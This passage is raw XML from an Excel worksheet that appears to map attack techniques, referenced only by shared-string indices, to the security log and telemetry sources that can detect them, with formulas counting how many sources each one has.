        <v>Packet capture,Web application firewall logs,Web logs,Packet capture</v>
      </c>
      <c r="C235" s="17" t="s">
        <v>134</v>
      </c>
      <c r="D235" s="53">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E235" s="53">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F235" s="53"/>
      <c r="G235" s="19"/>
    </row>
    <row r="236" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A236" s="16" t="s">
        <v>364</v>
      </c>
      <c r="B236" s="53" t="str">
        <f>LOOKUP(A236,'REF-DataSources'!A:C)</f>
        <v>Web logs,Web application firewall logs,Packet capture</v>
      </c>
      <c r="C236" s="17" t="s">
        <v>104</v>
      </c>
      <c r="D236" s="53">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E236" s="53">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F236" s="53"/>
      <c r="G236" s="19"/>
    </row>
    <row r="237" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A237" s="16" t="s">
        <v>365</v>
      </c>
      <c r="B237" s="53" t="str">
        <f>LOOKUP(A237,'REF-DataSources'!A:C)</f>
        <v>Web logs,Web application firewall logs,Packet capture</v>
      </c>
      <c r="C237" s="17" t="s">
        <v>55</v>
      </c>
      <c r="D237" s="53">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E237" s="53">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F237" s="53"/>
      <c r="G237" s="19"/>
    </row>
    <row r="238" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A238" s="16" t="s">
        <v>366</v>
      </c>
      <c r="B238" s="53" t="str">
        <f>LOOKUP(A238,'REF-DataSources'!A:C)</f>
        <v>Web logs,Web application firewall logs,Packet capture</v>
      </c>
      <c r="C238" s="17" t="s">
        <v>104</v>
      </c>
      <c r="D238" s="53">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E238" s="53">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F238" s="53"/>
      <c r="G238" s="19"/>
    </row>
    <row r="239" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A239" s="16" t="s">
        <v>367</v>
      </c>
      <c r="B239" s="53" t="str">
        <f>LOOKUP(A239,'REF-DataSources'!A:C)</f>
        <v>BIOS,Component firmware</v>
      </c>
      <c r="C239" s="17" t="s">
        <v>259</v>
      </c>
      <c r="D239" s="53">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E239" s="53">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F239" s="53"/>
      <c r="G239" s="19"/>
    </row>
    <row r="240" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A240" s="16" t="s">
        <v>368</v>
      </c>
      <c r="B240" s="53" t="str">
        <f>LOOKUP(A240,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,Stackdriver logs,AWS CloudTrail logs,Process use of network,Process monitoring,Network protocol analysis,Network device logs</v>
      </c>
      <c r="C240" s="17" t="s">
        <v>369</v>
      </c>
      <c r="D240" s="53">
        <f t="shared" si="7"/>
        <v>7</v>
      </c>
      <c r="E240" s="53">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F240" s="53"/>
      <c r="G240" s="19"/>
    </row>
    <row r="241" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A241" s="16" t="s">
        <v>370</v>
      </c>
      <c r="B241" s="53" t="str">
        <f>LOOKUP(A241,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C241" s="17" t="s">
        <v>55</v>
      </c>
      <c r="D241" s="53">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E241" s="53">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F241" s="53"/>
      <c r="G241" s="19"/>
    </row>
    <row r="242" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A242" s="16" t="s">
        <v>371</v>
      </c>
      <c r="B242" s="53" t="str">
        <f>LOOKUP(A242,'REF-DataSources'!A:C)</f>
        <v>Sensor health and status,Network protocol analysis,Netflow/Enclave netflow,Network intrusion detection system,Network device logs</v>
      </c>
      <c r="C242" s="17" t="s">
        <v>67</v>
      </c>
      <c r="D242" s="53">
        <f t="shared" si="7"/>
        <v>5</v>
      </c>
      <c r="E242" s="53">
        <f t="shared" si="8"/>
        <v>5</v>
      </c>
      <c r="F242" s="53"/>
      <c r="G242" s="19"/>
    </row>
    <row r="243" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A243" s="16" t="s">
        <v>372</v>
      </c>
      <c r="B243" s="53" t="str">
        <f>LOOKUP(A243,'REF-DataSources'!A:C)</f>
        <v>SSL/TLS inspection,Web logs,Web application firewall logs,Network intrusion detection system,Network protocol analysis,Network device logs,Netflow/Enclave netflow</v>
      </c>
      <c r="C243" s="17" t="s">
        <v>373</v>
      </c>
      <c r="D243" s="53">
        <f t="shared" si="7"/>
        <v>7</v>
      </c>
      <c r="E243" s="53">
        <f t="shared" si="8"/>
        <v>7</v>
      </c>
      <c r="F243" s="53"/>
      <c r="G243" s="19"/>
    </row>
    <row r="244" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A244" s="16" t="s">
        <v>374</v>
      </c>
      <c r="B244" s="53" t="str">
        <f>LOOKUP(A244,'REF-DataSources'!A:C)</f>
        <v>Network device logs,Network intrusion detection system,Web application firewall logs,Web logs,SSL/TLS inspection</v>
      </c>
      <c r="C244" s="17" t="s">
        <v>74</v>
      </c>
      <c r="D244" s="53">
        <f t="shared" si="7"/>
        <v>5</v>
      </c>
      <c r="E244" s="53">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F244" s="53"/>
      <c r="G244" s="19"/>
    </row>
    <row r="245" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A245" s="16" t="s">
        <v>375</v>
      </c>
      <c r="B245" s="53" t="str">
        <f>LOOKUP(A245,'REF-DataSources'!A:C)</f>
        <v>Network device logs,Network intrusion detection system,Web application firewall logs,Web logs,SSL/TLS inspection</v>
      </c>
      <c r="C245" s="17" t="s">
        <v>74</v>
      </c>
      <c r="D245" s="53">
        <f t="shared" si="7"/>
        <v>5</v>
      </c>
      <c r="E245" s="53">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F245" s="53"/>
      <c r="G245" s="19"/>
    </row>
    <row r="246" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A246" s="43" t="s">
        <v>376</v>
      </c>
      <c r="B246" s="53" t="str">
        <f>LOOKUP(A246,'REF-DataSources'!A:C)</f>
        <v>Network device logs,Network intrusion detection system,Web application firewall logs,Web logs,SSL/TLS inspection</v>
      </c>
      <c r="C246" s="17" t="s">
        <v>74</v>
      </c>
      <c r="D246" s="53">
        <f t="shared" si="7"/>
        <v>5</v>
      </c>
      <c r="E246" s="53">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F246" s="53"/>
      <c r="G246" s="19"/>
    </row>
    <row r="247" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A247" s="43" t="s">
        <v>377</v>
      </c>
      <c r="B247" s="53" t="str">
        <f>LOOKUP(A247,'REF-DataSources'!A:C)</f>
        <v>Network device logs,Network intrusion detection system,Web application firewall logs,Web logs,SSL/TLS inspection</v>
      </c>
      <c r="C247" s="17" t="s">
        <v>74</v>
      </c>
      <c r="D247" s="53">
        <f t="shared" si="7"/>
        <v>5</v>
      </c>
      <c r="E247" s="53">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F247" s="53"/>
      <c r="G247" s="19"/>
    </row>
    <row r="248" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A248" s="43" t="s">
        <v>378</v>
      </c>
      <c r="B248" s="53" t="str">
        <f>LOOKUP(A248,'REF-DataSources'!A:C)</f>
        <v>Network device logs,Network intrusion detection system,Web application firewall logs,Web logs,SSL/TLS inspection</v>
      </c>
      <c r="C248" s="17" t="s">
        <v>74</v>
      </c>
      <c r="D248" s="53">
        <f t="shared" si="7"/>
        <v>5</v>
      </c>
      <c r="E248" s="53">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F248" s="53"/>
      <c r="G248" s="19"/>
    </row>
    <row r="249" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A249" s="43" t="s">
        <v>379</v>
      </c>
      <c r="B249" s="53" t="str">
        <f>LOOKUP(A249,'REF-DataSources'!A:C)</f>
        <v>Netflow/Enclave netflow,Process monitoring,File monitoring,Application logs</v>
      </c>
      <c r="C249" s="17" t="s">
        <v>55</v>
      </c>
      <c r="D249" s="53">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E249" s="53">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F249" s="53"/>
      <c r="G249" s="19"/>
    </row>
    <row r="250" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A250" s="43" t="s">
        <v>380</v>
      </c>
      <c r="B250" s="53" t="str">
        <f>LOOKUP(A250,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Netflow/Enclave netflow,File monitoring,Authentication logs</v>
      </c>
      <c r="C250" s="17" t="s">
        <v>55</v>
      </c>
      <c r="D250" s="53">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E250" s="53">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F250" s="53"/>
      <c r="G250" s="19"/>
    </row>
    <row r="251" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A251" s="43" t="s">
        <v>381</v>
      </c>
      <c r="B251" s="53" t="str">
        <f>LOOKUP(A251,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Netflow/Enclave netflow,File monitoring,Authentication logs</v>
      </c>
      <c r="C251" s="17" t="s">
        <v>74</v>
      </c>
      <c r="D251" s="53">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E251" s="53">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F251" s="53"/>
      <c r="G251" s="19"/>
    </row>
    <row r="252" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A252" s="43" t="s">
        <v>382</v>
      </c>
      <c r="B252" s="53" t="str">
        <f>LOOKUP(A252,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,Azure activity logs,AWS CloudTrail logs,Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
      <c r="C252" s="17" t="s">
        <v>74</v>
      </c>
      <c r="D252" s="53">
        <f t="shared" si="7"/>
        <v>6</v>
      </c>
      <c r="E252" s="53">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F252" s="53"/>
      <c r="G252" s="19"/>
    </row>
    <row r="253" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A253" s="43" t="s">
        <v>383</v>
      </c>
      <c r="B253" s="53" t="str">
        <f>LOOKUP(A253,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,Azure activity logs,AWS CloudTrail logs,File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C253" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D253" s="53">
        <f t="shared" si="7"/>
        <v>6</v>
      </c>
      <c r="E253" s="53">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F253" s="53"/>
      <c r="G253" s="19"/>
    </row>
    <row r="254" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A254" s="43" t="s">
        <v>384</v>
      </c>
      <c r="B254" s="53" t="str">
        <f>LOOKUP(A254,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,Azure activity logs,AWS CloudTrail logs,File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C254" s="17" t="s">
        <v>74</v>
      </c>
      <c r="D254" s="53">
        <f t="shared" si="7"/>
        <v>6</v>
      </c>
      <c r="E254" s="53">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F254" s="53"/>
      <c r="G254" s="19"/>
    </row>
    <row r="255" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A255" s="43" t="s">
        <v>385</v>
      </c>
      <c r="B255" s="53" t="str">
        <f>LOOKUP(A255,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Asset management</v>
      </c>
      <c r="C255" s="17">
        <v>100</v>
      </c>
      <c r="D255" s="53">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E255" s="53">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F255" s="53"/>
      <c r="G255" s="19"/>
    </row>
    <row r="256" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A256" s="43" t="s">
        <v>386</v>
      </c>
      <c r="B256" s="53" t="str">
        <f>LOOKUP(A256,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,Stackdriver logs,AWS CloudTrail logs</v>
      </c>
      <c r="C256" s="17" t="s">
        <v>107</v>
      </c>
      <c r="D256" s="53">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E256" s="53">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F256" s="53"/>
      <c r="G256" s="19"/>
    </row>
    <row r="257" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A257" s="43" t="s">
        <v>387</v>
      </c>
      <c r="B257" s="53" t="str">
        <f>LOOKUP(A257,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,Stackdriver logs,AWS CloudTrail logs</v>
      </c>
      <c r="C257" s="17" t="s">
        <v>259</v>
      </c>
      <c r="D257" s="53">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E257" s="53">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F257" s="53"/>
      <c r="G257" s="19"/>
    </row>
    <row r="258" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A258" s="43" t="s">
        <v>388</v>
      </c>
      <c r="B258" s="53" t="str">
        <f>LOOKUP(A258,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,OAuth audit logs</v>
      </c>
      <c r="C258" s="17" t="s">
        <v>259</v>
      </c>
      <c r="D258" s="53">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E258" s="53">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F258" s="53"/>
      <c r="G258" s="19"/>
    </row>
    <row r="259" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A259" s="43" t="s">
        <v>389</v>
      </c>
      <c r="B259" s="53" t="str">
        <f>LOOKUP(A259,'REF-DataSources'!A:C)</f>
        <v>Windows event logs,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C259" s="17" t="s">
        <v>69</v>
      </c>
      <c r="D259" s="53">
        <f t="shared" ref="D259:D267" si="9">LEN(TRIM(B259))-LEN(SUBSTITUTE(TRIM(B259),",",""))+1</f>
        <v>3</v>
      </c>
      <c r="E259" s="53">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F259" s="53"/>
      <c r="G259" s="19"/>
    </row>
    <row r="260" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A260" s="43" t="s">
        <v>390</v>
      </c>
      <c r="B260" s="53" t="str">
        <f>LOOKUP(A260,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="C260" s="17" t="s">
        <v>69</v>
      </c>
      <c r="D260" s="53">
        <f t="shared" si="9"/>
        <v>3</v>
      </c>
      <c r="E260" s="53">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F260" s="53"/>
      <c r="G260" s="19"/>
    </row>
    <row r="261" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A261" s="43" t="s">
        <v>391</v>
      </c>
      <c r="B261" s="53" t="str">
        <f>LOOKUP(A261,'REF-DataSources'!A:C)</f>
        <v>Windows event logs,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C261" s="17" t="s">
        <v>69</v>
      </c>
      <c r="D261" s="53">
        <f t="shared" si="9"/>
        <v>3</v>
      </c>
      <c r="E261" s="53">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F261" s="53"/>
      <c r="G261" s="19"/>
    </row>
    <row r="262" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A262" s="43" t="s">
        <v>392</v>
      </c>
      <c r="B262" s="53" t="str">
        <f>LOOKUP(A262,'REF-DataSources'!A:C)</f>
        <v>SSL/TLS inspection,DNS records,Anti-virus,Web proxy,File monitoring,Mail server,Office 365 trace logs</v>
      </c>
      <c r="C262" s="17" t="s">
        <v>373</v>
      </c>
      <c r="D262" s="53">
        <f t="shared" si="9"/>
        <v>7</v>
      </c>
      <c r="E262" s="53">
        <f t="shared" si="8"/>
        <v>7</v>
      </c>
      <c r="F262" s="53"/>
      <c r="G262" s="19"/>
    </row>
    <row r="263" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A263" s="43" t="s">
        <v>393</v>
      </c>
      <c r="B263" s="53" t="str">
        <f>LOOKUP(A263,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="C263" s="17" t="s">
        <v>69</v>
      </c>
      <c r="D263" s="53">
        <f t="shared" si="9"/>
        <v>3</v>
      </c>
      <c r="E263" s="53">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F263" s="53"/>
      <c r="G263" s="19"/>
    </row>
    <row r="264" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A264" s="43" t="s">
        <v>394</v>
      </c>
      <c r="B264" s="53" t="str">
        <f>LOOKUP(A264,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="C264" s="17" t="s">
        <v>395</v>
      </c>
      <c r="D264" s="53">
        <f t="shared" si="9"/>
        <v>3</v>
      </c>
      <c r="E264" s="53">
        <f t="shared" si="8"/>
        <v>5</v>
      </c>
      <c r="F264" s="53"/>
      <c r="G264" s="19"/>
    </row>
    <row r="265" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A265" s="43" t="s">
        <v>396</v>
      </c>
      <c r="B265" s="53" t="str">
        <f>LOOKUP(A265,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="C265" s="17" t="s">
        <v>69</v>
      </c>
      <c r="D265" s="53">
        <f t="shared" si="9"/>
        <v>3</v>
      </c>
      <c r="E265" s="53">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F265" s="53"/>
      <c r="G265" s="19"/>
    </row>
    <row r="266" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A266" s="43" t="s">
        <v>397</v>
      </c>
      <c r="B266" s="53" t="str">
        <f>LOOKUP(A266,'REF-DataSources'!A:C)</f>
        <v>Office 365 audit logs,Azure activity logs,Stackdriver logs,AWS CloudTrail logs</v>
      </c>
      <c r="C266" s="17" t="s">
        <v>398</v>
      </c>
      <c r="D266" s="53">
        <f t="shared" si="9"/>
        <v>4</v>
      </c>
      <c r="E266" s="53">
        <f t="shared" ref="E266:E267" si="10">LEN(TRIM(C266))-LEN(SUBSTITUTE(TRIM(C266),";",""))+1</f>
        <v>4</v>
      </c>
      <c r="F266" s="53"/>
      <c r="G266" s="19"/>
    </row>
    <row r="267" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A267" s="43" t="s">
        <v>399</v>
      </c>
      <c r="B267" s="53" t="str">
        <f>LOOKUP(A267,'REF-DataSources'!A:C)</f>
        <v>File monitoring,API monitoring</v>
      </c>
      <c r="C267" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D267" s="53">
        <f t="shared" si="9"/>
        <v>2</v>
      </c>
      <c r="E267" s="53">
        <f t="shared" si="10"/>
        <v>2</v>
      </c>
      <c r="F267" s="53"/>
      <c r="G267" s="19"/>
    </row>
  </sheetData>
  <conditionalFormatting sqref="G2">
    <cfRule type="iconSet" priority="1">
      <iconSet iconSet="3Symbols2" reverse="1">
        <cfvo type="percent" val="0"/>
        <cfvo type="num" val="0" gte="0"/>
        <cfvo type="num" val="0" gte="0"/>
      </iconSet>
    </cfRule>
  </conditionalFormatting>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EB93-49D3-4570-BE84-8F26EFDC4B69}">
  <dimension ref="A1:U267"/>
  <sheetViews>
    <sheetView zoomScale="140" zoomScaleNormal="140" workbookViewId="0">
      <selection activeCell="C258" sqref="C258"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="8.83203125" defaultRowHeight="15" zeroHeight="1" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="11.1640625" style="4" customWidth="1"/>
    <col min="2" max="2" width="124.83203125" style="4" customWidth="1"/>
    <col min="3" max="3" width="21" style="5" customWidth="1"/>
    <col min="4" max="4" width="15.6640625" style="4" customWidth="1"/>
    <col min="5" max="5" width="11.1640625" style="4" customWidth="1"/>
    <col min="6" max="6" width="11.1640625" style="51" customWidth="1"/>
    <col min="7" max="7" width="47.6640625" style="12" hidden="1" customWidth="1"/>
    <col min="8" max="21" width="9.1640625" style="3" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:7" s="3" customFormat="1" ht="33" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A1" s="28" t="s">
        <v>37</v>
      </c>
      <c r="B1" s="28" t="s">
        <v>400</v>
      </c>
      <c r="C1" s="28" t="s">
        <v>39</v>
      </c>
      <c r="D1" s="28" t="s">
        <v>40</v>
      </c>
      <c r="E1" s="28" t="s">
        <v>41</v>
      </c>
      <c r="F1" s="48" t="s">
        <v>42</v>
      </c>
      <c r="G1" s="47" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="2" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A2" s="16" t="s">
        <v>44</v>
      </c>
      <c r="B2" s="45" t="str">
        <f>LOOKUP(A2,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C2" s="17">
        <v>0</v>
      </c>
      <c r="D2" s="45">
        <f>LEN(TRIM(B2))-LEN(SUBSTITUTE(TRIM(B2),",",""))+1</f>
        <v>1</v>
      </c>
      <c r="E2" s="45">
        <f t="shared" ref="E2:E8" si="0">LEN(TRIM(C2))-LEN(SUBSTITUTE(TRIM(C2),";",""))+1</f>
        <v>1</v>
      </c>
      <c r="F2" s="49"/>
      <c r="G2" s="45">
        <f>SUM(COUNTA('REF-DataSources'!A:A)-COUNTA(A:A))</f>
        <v>302</v>
      </c>
    </row>
    <row r="3" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A3" s="16" t="s">
        <v>46</v>
      </c>
      <c r="B3" s="45" t="str">
        <f>LOOKUP(A3,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C3" s="17">
        <v>0</v>
      </c>
      <c r="D3" s="45">
        <f t="shared" ref="D3:D66" si="1">LEN(TRIM(B3))-LEN(SUBSTITUTE(TRIM(B3),",",""))+1</f>
        <v>1</v>
      </c>
      <c r="E3" s="45">
        <f t="shared" si="0"/>
        <v>1</v>
      </c>
      <c r="F3" s="49"/>
      <c r="G3" s="19"/>
    </row>
    <row r="4" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A4" s="16" t="s">
        <v>48</v>
      </c>
      <c r="B4" s="45" t="str">
        <f>LOOKUP(A4,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C4" s="17">
        <v>0</v>
      </c>
      <c r="D4" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E4" s="45">
        <f t="shared" si="0"/>
        <v>1</v>
      </c>
      <c r="F4" s="49"/>
      <c r="G4" s="19"/>
    </row>
    <row r="5" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A5" s="16" t="s">
        <v>49</v>
      </c>
      <c r="B5" s="45" t="str">
        <f>LOOKUP(A5,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C5" s="17">
        <v>0</v>
      </c>
      <c r="D5" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E5" s="45">
        <f t="shared" si="0"/>
        <v>1</v>
      </c>
      <c r="F5" s="49"/>
      <c r="G5" s="19"/>
    </row>
    <row r="6" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A6" s="16" t="s">
        <v>51</v>
      </c>
      <c r="B6" s="45" t="str">
        <f>LOOKUP(A6,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C6" s="17">
        <v>0</v>
      </c>
      <c r="D6" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E6" s="45">
        <f t="shared" si="0"/>
        <v>1</v>
      </c>
      <c r="F6" s="49"/>
      <c r="G6" s="19"/>
    </row>
    <row r="7" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A7" s="16" t="s">
        <v>53</v>
      </c>
      <c r="B7" s="45" t="str">
        <f>LOOKUP(A7,'REF-DataSources'!A:H)</f>
        <v>File monitoring,File system access controls</v>
      </c>
      <c r="C7" s="17" t="s">
        <v>259</v>
      </c>
      <c r="D7" s="45">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E7" s="45">
        <f t="shared" si="0"/>
        <v>2</v>
      </c>
      <c r="F7" s="50"/>
      <c r="G7" s="19"/>
    </row>
    <row r="8" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A8" s="16" t="s">
        <v>54</v>
      </c>
      <c r="B8" s="45" t="str">
        <f>LOOKUP(A8,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C8" s="17">
        <v>0</v>
      </c>
      <c r="D8" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E8" s="45">
        <f t="shared" si="0"/>
        <v>1</v>
      </c>
      <c r="F8" s="50"/>
      <c r="G8" s="19"/>
    </row>
    <row r="9" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A9" s="16" t="s">
        <v>56</v>
      </c>
      <c r="B9" s="45" t="str">
        <f>LOOKUP(A9,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C9" s="17">
        <v>0</v>
      </c>
      <c r="D9" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E9" s="45">
        <f>LEN(TRIM(C9))-LEN(SUBSTITUTE(TRIM(C9),";",""))+1</f>
        <v>1</v>
      </c>
      <c r="F9" s="50"/>
      <c r="G9" s="19"/>
    </row>
    <row r="10" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A10" s="16" t="s">
        <v>58</v>
      </c>
      <c r="B10" s="45" t="str">
        <f>LOOKUP(A10,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C10" s="17" t="s">
        <v>259</v>
      </c>
      <c r="D10" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E10" s="45">
        <f t="shared" ref="E10:E73" si="2">LEN(TRIM(C10))-LEN(SUBSTITUTE(TRIM(C10),";",""))+1</f>
        <v>2</v>
      </c>
      <c r="F10" s="50"/>
      <c r="G10" s="19"/>
    </row>
    <row r="11" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A11" s="16" t="s">
        <v>60</v>
      </c>
      <c r="B11" s="45" t="str">
        <f>LOOKUP(A11,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C11" s="17">
        <v>0</v>
      </c>
      <c r="D11" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E11" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F11" s="50"/>
      <c r="G11" s="19"/>
    </row>
    <row r="12" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A12" s="16" t="s">
        <v>62</v>
      </c>
      <c r="B12" s="45" t="str">
        <f>LOOKUP(A12,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C12" s="17">
        <v>0</v>
      </c>
      <c r="D12" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E12" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F12" s="50"/>
      <c r="G12" s="19"/>
    </row>
    <row r="13" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A13" s="16" t="s">
        <v>64</v>
      </c>
      <c r="B13" s="45" t="str">
        <f>LOOKUP(A13,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C13" s="17">
        <v>0</v>
      </c>
      <c r="D13" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E13" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F13" s="50"/>
      <c r="G13" s="19"/>
    </row>
    <row r="14" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A14" s="16" t="s">
        <v>66</v>
      </c>
      <c r="B14" s="45" t="str">
        <f>LOOKUP(A14,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C14" s="17">
        <v>0</v>
      </c>
      <c r="D14" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E14" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F14" s="50"/>
      <c r="G14" s="19"/>
    </row>
    <row r="15" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A15" s="16" t="s">
        <v>68</v>
      </c>
      <c r="B15" s="45" t="str">
        <f>LOOKUP(A15,'REF-DataSources'!A:H)</f>
        <v>File monitoring,Host intrusion prevention systems,Application control,Signature-based detection,System access controls,Application control by file name or path,Anti-virus</v>
      </c>
      <c r="C15" s="17" t="s">
        <v>401</v>
      </c>
      <c r="D15" s="45">
        <f t="shared" si="1"/>
        <v>7</v>
      </c>
      <c r="E15" s="45">
